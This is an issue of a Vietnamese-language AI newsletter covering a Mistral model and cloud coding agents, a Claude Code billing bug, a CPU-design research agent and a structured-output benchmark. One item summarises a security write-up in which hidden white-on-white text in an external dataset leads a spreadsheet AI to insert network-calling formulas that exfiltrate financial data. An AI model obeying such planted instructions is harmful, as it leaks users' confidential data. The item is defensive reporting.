tinAI #099: Mistral Medium 3.5 + Vibe remote agents: coding agent chạy trong cloud, mở PR khi xong

tinAI tóm tắt nguồn công khai, thêm bối cảnh biên tập cho độc giả, và giữ liên kết nguồn trong từng mục.

Tin nổi bật

Mistral Medium 3.5 + Vibe remote agents: coding agent chạy trong cloud, mở PR khi xong · 8 phút https://mistral.ai/news/vibe-remote-agents-mistral-medium-3-5

Mistral Medium 3.5 ra mắt với 128B params dense, context window 256k, đạt 77.6% trên SWE-Bench Verified — vượt cả Devstral 2 lẫn Qwen3.5 397B A17B. Nhưng phần đáng quan tâm hơn model là Vibe remote agents: bạn launch một coding session từ Le Chat hoặc Vibe CLI, agent chạy trong sandbox cloud, mở pull request khi xong, song song nhiều task cùng lúc — không bị stuck với một local terminal. Giá API $1.5/$7.5 per million tokens (input/output) đặt nó ở khoảng giữa Sonnet và Opus, nhưng open weights trên Hugging Face dưới modified MIT license nghĩa là tự host được chỉ với 4 GPU. Nếu workflow của bạn đang là “kick off task, chờ agent xong, review”, đây là model đáng thử thay cho default Claude/Devstral.

Models & Tools

Bug Claude Code: chuỗi HERMES.md trong commit message khiến request bị tính extra usage · 4 phút https://github.com/anthropics/claude-code/issues/53262

Một developer phát hiện bằng binary search: nếu git commit history của repo chứa case-sensitive string HERMES.md, Claude Code route request sang extra usage billing thay vì plan quota — anh ta đốt $200 credits trong khi dashboard vẫn báo còn 86% weekly capacity. hermes.md chữ thường, HERMES.txt, AGENTS.md đều OK; chỉ chuỗi đó cụ thể trigger. Lỗi nằm ở server-side content-based routing dựa trên commit message trong system prompt — nếu repo của bạn có file đó, kiểm tra usage ngay.

Ramp Sheets AI bị prompt injection exfil dữ liệu tài chính qua formula · 5 phút https://www.promptarmor.com/resources/ramps-sheets-ai-exfiltrates-financials

PromptArmor demo cách giấu indirect prompt injection trong dataset external (white-on-white text) khiến Ramp Sheets AI tự chèn formula gọi network request, exfil dữ liệu confidential mà không cần user approval. Bug đã được fix tháng 3 nhưng bài học áp dụng cho mọi AI agent ghi spreadsheet: agent vừa đọc untrusted data vừa có quyền chèn formula = attacker có channel exfil ngay trong tool. Claude for Excel cũng từng có lỗ hổng tương tự.

Research & Insights

Auto-Architecture: agent autoresearch của Karpathy thiết kế CPU RISC-V tự động · 9 phút https://github.com/FeSens/auto-arch-tournament/blob/main/docs/auto-arch-tournament-blog-post.md

Karpathy’s autoresearch loop — propose / implement / measure / keep wins — vừa được port sang lĩnh vực mới: thiết kế CPU. Tác giả áp dụng vào core RV32IM in-order viết bằng SystemVerilog, dùng riscv-formal + Verilator cosim + nextpnr P&R làm fitness function. Sau 73 hypothesis và 9h 51m wall-clock, agent tìm ra 10 cải tiến (instruction-replay table, static branch prediction, hot/cold ALU split, pending-store retirement) đẩy CoreMark lên +91.9% so với baseline. Đây là blueprint thực tế cho việc dùng LLM tối ưu code ở domain ngoài comfort zone — Python/gradient descent.

SOB benchmark: đo Value Accuracy thay vì chỉ schema compliance cho structured output · 5 phút https://interfaze.ai/blog/introducing-structured-output-benchmark

Hầu hết benchmark structured output chỉ check schema validity — model emit JSON đúng format nhưng giá trị sai vẫn ăn 100%. SOB tách ra Value Accuracy và Perfect Response, test trên text (HotpotQA), image (olmOCR-bench), audio (AMI Meeting Corpus) qua cùng một scoring harness. Top-5 cho thấy structural metrics đã saturate gần 100% — khác biệt thật giữa model nằm ở value accuracy. Nếu bạn đang chọn model cho extraction pipeline, leaderboard này informative hơn JSON validation rate.

— tinAI

tinAI #099: Mistral Medium 3.5 + Vibe remote agents: coding agent chạy trong cloud, mở PR khi xong

Bài dịch trong bản tin này

Tin nổi bật

Models & Tools

Research & Insights